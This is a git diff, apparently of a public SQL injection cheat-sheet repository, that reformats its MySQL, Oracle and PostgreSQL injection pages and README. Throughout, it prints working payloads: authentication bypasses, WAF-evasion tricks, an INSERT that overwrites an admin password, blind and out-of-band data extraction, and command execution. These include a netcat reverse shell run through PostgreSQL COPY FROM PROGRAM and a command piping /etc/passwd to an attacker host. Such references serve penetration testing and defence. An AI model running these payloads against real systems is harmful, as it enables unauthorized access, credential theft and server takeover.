* **INFO** : The text of the statement being executed, or NULL if no statement is being executed.
```sql
SELECT * FROM INFORMATION_SCHEMA.PROCESSLIST;
```
| ID | USER | HOST | DB | COMMAND | TIME | STATE | INFO |
| --- | --------- | ---------------- | ------- | ------- | ---- | ---------- | ---- |
| 1 | root | localhost | testdb | Query | 10 | executing | SELECT * FROM some_table |
| 2 | app_uset | 192.168.0.101 | appdb | Sleep | 300 | sleeping | NULL |
| 3 | gues_user | example.com:3360 | NULL | Connect | 0 | connecting | NULL |
| ID | USER | HOST | DB | COMMAND | TIME | STATE | INFO |
| --- | --------- | ---------------- | ------- | ------- | ---- | ---------- | ---- |
| 1 | root | localhost | testdb | Query | 10 | executing | SELECT * FROM some_table |
| 2 | app_uset | 192.168.0.101 | appdb | Sleep | 300 | sleeping | NULL |
| 3 | gues_user | example.com:3360 | NULL | Connect | 0 | connecting | NULL |
```sql
UNION SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST #
@ -514,7 +499,6 @@ Dump in one shot query to extract the whole content of the table.
UNION SELECT 1,(SELECT(@)FROM(SELECT(@:=0X00),(SELECT(@)FROM(information_schema.processlist)WHERE(@)IN(@:=CONCAT(@,0x3C62723E,state,0x3a,info))))a),3,4 #
```
## MYSQL Read Content of a File
Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`
@ -571,7 +555,6 @@ mysql> SELECT sys_eval('id');
+--------------------------------------------------+
```
## MYSQL INSERT
`ON DUPLICATE KEY UPDATE` keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
@ -588,14 +571,13 @@ The query would look like this:
INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "BCRYPT_HASH"), ("admin@example.com", "P@ssw0rd") ON DUPLICATE KEY UPDATE password="P@ssw0rd" -- ", "BCRYPT_HASH_OF_YOUR_PASSWORD_INPUT");
```
This query will insert a row for the user "attacker_dummy@example.com". It will also insert a row for the user "admin@example.com".
Because this row already exists, the `ON DUPLICATE KEY UPDATE` keyword tells MySQL to update the `password` column of the already existing row to "P@ssw0rd". After this, we can simply authenticate with "admin@example.com" and the password "P@ssw0rd".
This query will insert a row for the user "`attacker_dummy@example.com`". It will also insert a row for the user "`admin@example.com`".
Because this row already exists, the `ON DUPLICATE KEY UPDATE` keyword tells MySQL to update the `password` column of the already existing row to "P@ssw0rd". After this, we can simply authenticate with "`admin@example.com`" and the password "P@ssw0rd".
## MYSQL Truncation
In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
In MYSQL "`admin`" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
```sql
`username` varchar(20) not null
@ -603,7 +585,6 @@ In MYSQL "`admin `" and "`admin`" are the same. If the username column in the da
Payload: `username = "admin a"`
## MYSQL Out of Band
```powershell
@ -632,7 +613,6 @@ LOAD DATA INFILE '\\\\error\\abc' INTO TABLE DATABASE.TABLE_NAME;
:warning: Don't forget to escape the '\\\\'.
## MYSQL WAF Bypass
### Alternative to Information Schema
@ -658,7 +638,6 @@ mysql> SHOW TABLES IN dvwa;
+----------------+
```
### Alternative to VERSION
```sql
@ -691,7 +670,6 @@ mysql> SELECT @@GLOBAL.VERSION;
+------------------+
```
### Alternative to GROUP_CONCAT
Requirement: `MySQL >= 5.7.22`
@ -705,7 +683,6 @@ Use `json_arrayagg()` instead of `group_concat()` which allows less symbols to b
SELECT json_arrayagg(concat_ws(0x3a,table_schema,table_name)) from INFORMATION_SCHEMA.TABLES;
```
### Scientific Notation
In MySQL, the e notation is used to represent numbers in scientific notation. It's a way to express very large or very small numbers in a concise format. The e notation consists of a number followed by the letter e and an exponent.
@ -713,30 +690,28 @@ The format is: `base 'e' exponent`.
For example:
* `1e3` represents `1 x 10^3` which is `1000`.
* `1.5e3` represents `1.5 x 10^3` which is `1500`.
* `2e-3` represents `2 x 10^-3` which is `0.002`.
* `1e3` represents `1 x 10^3` which is `1000`.
* `1.5e3` represents `1.5 x 10^3` which is `1500`.
* `2e-3` represents `2 x 10^-3` which is `0.002`.
The following queries are equivalent:
* `SELECT table_name FROM information_schema 1.e.tables`
* `SELECT table_name FROM information_schema .tables`
In the same way, the common payload to bypass authentication `' or ''='` is equivalent to `' or 1.e('')='` and `1' or 1.e(1) or '1'='1`.
This technique can be used to obfuscate queries to bypass WAF, for example: `1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2`
* `SELECT table_name FROM information_schema 1.e.tables`
* `SELECT table_name FROM information_schema .tables`
In the same way, the common payload to bypass authentication `' or ''='` is equivalent to `' or 1.e('')='` and `1' or 1.e(1) or '1'='1`.
This technique can be used to obfuscate queries to bypass WAF, for example: `1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2`
### Conditional Comments
MySQL conditional comments are enclosed within `/*! ... */` and can include a version number to specify the minimum version of MySQL that should execute the contained code.
The code inside this comment will be executed only if the MySQL version is greater than or equal to the number immediately following the `/*!`. If the MySQL version is less than the specified number, the code inside the comment will be ignored.
The code inside this comment will be executed only if the MySQL version is greater than or equal to the number immediately following the `/*!`. If the MySQL version is less than the specified number, the code inside the comment will be ignored.
* `/*!12345UNION*/`: This means that the word UNION will be executed as part of the SQL statement if the MySQL version is 12.345 or higher.
* `/*!31337SELECT*/`: Similarly, the word SELECT will be executed if the MySQL version is 31.337 or higher.
**Examples**: `/*!12345UNION*/`, `/*!31337SELECT*/`
### Wide Byte Injection (GBK)
Wide byte injection is a specific type of SQL injection attack that targets applications using multi-byte character sets, like GBK or SJIS. The term "wide byte" refers to character encodings where one character can be represented by more than one byte. This type of injection is particularly relevant when the application and the database interpret multi-byte sequences differently.
@ -779,23 +754,22 @@ Here's a breakdown of how the wide byte injection works:
For instance, if the input is `?id=1'`, PHP will add a backslash, resulting in the SQL query: `SELECT * FROM users WHERE id='1\'' LIMIT 0,1`.
However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`.
However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`.
In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape charactr, allowing for SQL injection.
Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic.
## References
- [[SQLi] Extracting data without knowing columns names - Ahmed Sultan - February 9, 2019](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
- [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
- [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
- [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
- [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased)
- [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
- [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
- [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://www.youtube.com/watch?v=u91EdO1cDak)
- [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://resources.infosecinstitute.com/sql-truncation-attack/)
- [SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
- [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)
* [[SQLi] Extracting data without knowing columns names - Ahmed Sultan - February 9, 2019](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
* [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased)
* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
* [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
* [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://www.youtube.com/watch?v=u91EdO1cDak)
* [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://resources.infosecinstitute.com/sql-truncation-attack/)
* [SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)

45
SQL Injection/OracleSQL Injection.md
View file

@ -2,7 +2,6 @@
> Oracle SQL Injection is a type of security vulnerability that arises when attackers can insert or "inject" malicious SQL code into SQL queries executed by Oracle Database. This can occur when user inputs are not properly sanitized or parameterized, allowing attackers to manipulate the query logic. This can lead to unauthorized access, data manipulation, and other severe security implications.
## Summary
* [Oracle SQL Default Databases](#oracle-sql-default-databases)
@ -21,14 +20,13 @@
* [Oracle SQL Command Execution](#oracle-sql-command-execution)
* [Oracle Java Execution](#oracle-java-execution)
* [Oracle Java Class](#oracle-java-class)
* [OracleSQL File Manipulation](#OracleSQL-file-manipulation)
* [OracleSQL Read File](#OracleSQL-read-file)
* [OracleSQL Write File](#OracleSQL-write-file)
* [OracleSQL File Manipulation](#oraclesql-file-manipulation)
* [OracleSQL Read File](#oraclesql-read-file)
* [OracleSQL Write File](#oraclesql-write-file)
* [Package os_command](#package-os_command)
* [DBMS_SCHEDULER Jobs](#dbms_scheduler-jobs)
* [References](#references)
## Oracle SQL Default Databases
| Name | Description |
@ -36,7 +34,6 @@
| SYSTEM | Available in all versions |
| SYSAUX | Available in all versions |
## Oracle SQL Comments
| Type | Comment |
@ -44,7 +41,6 @@
| Single-Line Comment | `--` |
| Multi-Line Comment | `/**/` |
## Oracle SQL Enumeration
| Description | SQL Query |
@ -64,7 +60,6 @@
| Database name | `SELECT SYS.DATABASE_NAME FROM DUAL;` |
| Database name | `SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM dual;` |
## Oracle SQL Database Credentials
| Query | Description |
@ -73,7 +68,6 @@
| `SELECT name, password from sys.user$;` | Privileged, <= 10g |
| `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g |
## Oracle SQL Methodology
### Oracle SQL List Databases
@ -99,7 +93,6 @@ SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='<TABLE_NAME>' AND OWNER='<DBNAME>'
```
## Oracle SQL Error Based
| Description | Query |
@ -117,24 +110,21 @@ SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='<TABLE_N
When the injection point is inside a string use : `'||PAYLOAD--`
## Oracle SQL Blind
| Description | Query |
| :----------------------- | :------------- |
| Version is 12.2 | `SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';` |
| Subselect is enabled | `SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)` |
| Version is 12.2 | `SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';` |
| Subselect is enabled | `SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)` |
| Table log_table exists | `SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);` |
| Column message exists in table log_table | `SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';` |
| First letter of first message is t | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` |
### Oracle Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------- |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
| ----------- | ----------------------------------------- |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
## Oracle SQL Time Based
@ -143,14 +133,12 @@ AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END)
```
## Oracle SQL Out of Band
```sql
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
```
## Oracle SQL Command Execution
* [quentinhardy/odat](https://github.com/quentinhardy/odat) - ODAT (Oracle Database Attacking Tool)
@ -186,7 +174,6 @@ SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE roo
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
```
### Oracle Java Class
* Create Java class
@ -209,8 +196,7 @@ SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE roo
```sql
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```
```
### Package os_command
@ -224,7 +210,6 @@ SELECT os_command.exec_clob('<COMMAND>') cmd from dual
DBMS_SCHEDULER.CREATE_JOB (job_name => 'exec', job_type => 'EXECUTABLE', job_action => '<COMMAND>', enabled => TRUE)
```
## OracleSQL File Manipulation
:warning: Only in a stacked query.
@ -241,13 +226,11 @@ utl_file.get_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
utl_file.put_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
```
## References
- [ASDC12 - New and Improved Hacking Oracle From Web - Sumit “sid” Siddharth - November 8, 2021](https://web.archive.org/web/20211108150011/https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
- [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
- [ODAT: Oracle Database Attacking Tool - quentinhardy - March 24, 2016](https://github.com/quentinhardy/odat/wiki/privesc)
- [Oracle SQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
- [Pentesting Oracle TNS Listener - HackTricks - July 19, 2024](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
- [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases)
* [ASDC12 - New and Improved Hacking Oracle From Web - Sumit “sid” Siddharth - November 8, 2021](https://web.archive.org/web/20211108150011/https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
* [ODAT: Oracle Database Attacking Tool - quentinhardy - March 24, 2016](https://github.com/quentinhardy/odat/wiki/privesc)
* [Oracle SQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* [Pentesting Oracle TNS Listener - HackTricks - July 19, 2024](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
* [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases)

50
SQL Injection/PostgreSQL Injection.md
View file

@ -2,7 +2,6 @@
> PostgreSQL SQL injection refers to a type of security vulnerability where attackers exploit improperly sanitized user input to execute unauthorized SQL commands within a PostgreSQL database.
## Summary
* [PostgreSQL Comments](#postgresql-comments)
@ -28,7 +27,6 @@
* [PostgreSQL Superuser Role](#postgresql-superuser-role)
* [References](#references)
## PostgreSQL Comments
| Type | Comment |
@ -36,12 +34,11 @@
| Single-Line Comment | `--` |
| Multi-Line Comment | `/**/` |
## PostgreSQL Enumeration
| Description | SQL Query |
| ---------------------- | --------------------------------------- |
| DBMS version | `SELECT version()` |
| DBMS version | `SELECT version()` |
| Database Name | `SELECT CURRENT_DATABASE()` |
| Database Schema | `SELECT CURRENT_SCHEMA()` |
| List PostgreSQL Users | `SELECT usename FROM pg_user` |
@ -53,19 +50,17 @@
| Current User | `SELECT usename FROM pg_user;` |
| Current User | `SELECT getpgusername();` |
## PostgreSQL Methodology
| Description | SQL Query |
| ---------------------- | -------------------------------------------- |
| List Schemas | `SELECT DISTINCT(schemaname) FROM pg_tables` |
| List Databases | `SELECT datname FROM pg_database` |
| List Databases | `SELECT datname FROM pg_database` |
| List Tables | `SELECT table_name FROM information_schema.tables` |
| List Tables | `SELECT table_name FROM information_schema.tables WHERE table_schema='<SCHEMA_NAME>'` |
| List Tables | `SELECT tablename FROM pg_tables WHERE schemaname = '<SCHEMA_NAME>'` |
| List Columns | `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` |
## PostgreSQL Error Based
| Name | Payload |
@ -75,8 +70,6 @@
| CAST | `AND CAST((SELECT version()) AS INT)=1337 -- -` |
| CAST | `AND (SELECT version())::int=1 -- -` |
```sql
CAST(chr(126)||VERSION()||chr(126) AS NUMERIC)
CAST(chr(126)||(SELECT table_name FROM information_schema.tables LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)--
@ -106,16 +99,15 @@ SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML sch
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
## PostgreSQL Blind
### PostgreSQL Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------------- |
| ----------- | ----------------------------------------------- |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar' FROM <START> FOR <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar' FROM <START> FOR <LENGTH>)` |
Examples:
@ -124,10 +116,9 @@ Examples:
' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE
```
## PostgreSQL Time Based
#### Identify Time Based
### Identify Time Based
```sql
select 1 from pg_sleep(5)
@ -135,19 +126,19 @@ select 1 from pg_sleep(5)
||(select 1 from pg_sleep(5))
```
#### Database Dump Time Based
### Database Dump Time Based
```sql
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
```
#### Table Dump Time Based
### Table Dump Time Based
```sql
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
```
#### Columns Dump Time Based
### Columns Dump Time Based
```sql
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
@ -162,7 +153,7 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
## PostgreSQL Out of Band
Out-of-band SQL injections in PostgreSQL relies on the use of functions that can interact with the file system or network, such as `COPY`, `lo_export`, or functions from extensions that can perform network actions. The idea is to exploit the database to send data elsewhere, which the attacker can monitor and intercept.
Out-of-band SQL injections in PostgreSQL relies on the use of functions that can interact with the file system or network, such as `COPY`, `lo_export`, or functions from extensions that can perform network actions. The idea is to exploit the database to send data elsewhere, which the attacker can monitor and intercept.
```sql
declare c text;
@ -176,7 +167,6 @@ $$ language plpgsql security definer;
SELECT f();
```
## PostgreSQL Stacked Query
Use a semi-colon "`;`" to add another query
@ -185,7 +175,6 @@ Use a semi-colon "`;`" to add another query
SELECT 1;CREATE TABLE NOTSOSECURE (DATA VARCHAR(200));--
```
## PostgreSQL File Manipulation
### PostgreSQL File Read
@ -215,7 +204,6 @@ NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_fil
SELECT * from pg_largeobject; -- or just get all the large objects and their data
```
### PostgreSQL File Write
* Using `COPY`
@ -241,7 +229,6 @@ NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_fil
SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
```
## PostgreSQL Command Execution
### Using COPY TO/FROM PROGRAM
@ -257,7 +244,6 @@ CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f';
```
### Using libc.so.6
```sql
@ -265,7 +251,6 @@ CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
```
## PostgreSQL WAF Bypass
### Alternative to Quotes
@ -275,7 +260,6 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
| `SELECT CHR(65)\|\|CHR(66)\|\|CHR(67);` | String from `CHR()` |
| `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) |
## PostgreSQL Privileges
### PostgreSQL List Privileges
@ -296,10 +280,10 @@ SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
## References
- [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
- [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
- [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
- [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
- [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
- [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803)
- [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)
* [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
* [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
* [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803)
* [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)

69
SQL Injection/README.md
View file

@ -2,10 +2,9 @@
> SQL Injection (SQLi) is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. SQL Injection is one of the most common and severe types of web application vulnerabilities, enabling attackers to execute arbitrary SQL code on the database. This can lead to unauthorized data access, data manipulation, and, in some cases, full compromise of the database server.
## Summary
* [CheatSheets](#cheatsheets)
* [CheatSheets](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/)
* [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
* [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
* [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
@ -26,7 +25,7 @@
* [Blind Error Based Injection](#blind-error-based-injection)
* [Time Based Injection](#time-based-injection)
* [Out of Band (OAST)](#out-of-band-oast)
* [Stack Based Injection](#stack-based-injection)
* [Stacked Based Injection](#stacked-based-injection)
* [Polyglot Injection](#polyglot-injection)
* [Routed Injection](#routed-injection)
* [Second Order SQL Injection](#second-order-sql-injection)
@ -38,13 +37,11 @@
* [Labs](#labs)
* [References](#references)
## Tools
* [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
* [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
## Entry Point Detection
Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries.
@ -59,6 +56,7 @@ Detecting the entry point in SQL injection (SQLi) involves identifying locations
* **Tautology-Based SQL Injection**: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering `admin' OR '1'='1` in a username field might log you in as the admin if the system is vulnerable.
* Merging characters
```sql
`+HERP
'||'DERP
@ -67,7 +65,9 @@ Detecting the entry point in SQL injection (SQLi) involves identifying locations
'%20'HERP
'%2B'HERP
```
* Logic Testing
```sql
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
@ -77,7 +77,6 @@ Detecting the entry point in SQL injection (SQLi) involves identifying locations
* **Timing Attacks**: Inputting SQL commands that cause deliberate delays (e.g., using `SLEEP` or `BENCHMARK` functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable.
## DBMS Identification
### DBMS Identification Keyword Based
@ -109,7 +108,6 @@ Certain SQL keywords are specific to particular database management systems (DBM
| MSACCESS | `val(cvar(1))=1` |
| MSACCESS | `IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0` |
### DBMS Identification Error Based
Different DBMSs return distinct error messages when they encounter issues. By triggering errors and examining the specific messages sent back by the database, you can often identify the type of DBMS the website is using.
@ -126,11 +124,9 @@ Different DBMSs return distinct error messages when they encounter issues. By tr
| Oracle | `ORA-01756: quoted string not properly terminated` | `'` |
| Oracle | `ORA-00923: FROM keyword not found where expected` | `1'` |
## Authentication Bypass
In a standard authentication mechanism, users provide a username and password. The application typically checks these credentials against a database. For example, a SQL query might look something like this:
In a standard authentication mechanism, users provide a username and password. The application typically checks these credentials against a database. For example, a SQL query might look something like this:
```SQL
SELECT * FROM users WHERE username = 'user' AND password = 'pass';
@ -150,7 +146,7 @@ SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';
Here, `'1'='1'` is always true, which means the query could return a valid user, effectively bypassing the authentication check.
:warning: In this case, the database will return an array of results because it will match every users in the table. This will produce an error in the server side since it was expecting only one result. By adding a `LIMIT` clause, you can restrict the number of rows returned by the query. By submitting the following payload in the username field, you will log in as the first user in the database. Additionally, you can inject a payload in the password field while using the correct username to target a specific user.
:warning: In this case, the database will return an array of results because it will match every users in the table. This will produce an error in the server side since it was expecting only one result. By adding a `LIMIT` clause, you can restrict the number of rows returned by the query. By submitting the following payload in the username field, you will log in as the first user in the database. Additionally, you can inject a payload in the password field while using the correct username to target a specific user.
```sql
' or 1=1 limit 1 --
@ -160,7 +156,6 @@ Here, `'1'='1'` is always true, which means the query could return a valid user,
* [PayloadsAllTheThings/SQL Injection/Intruder/Auth_Bypass.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Intruder/Auth_Bypass.txt)
### Raw MD5 and SHA1
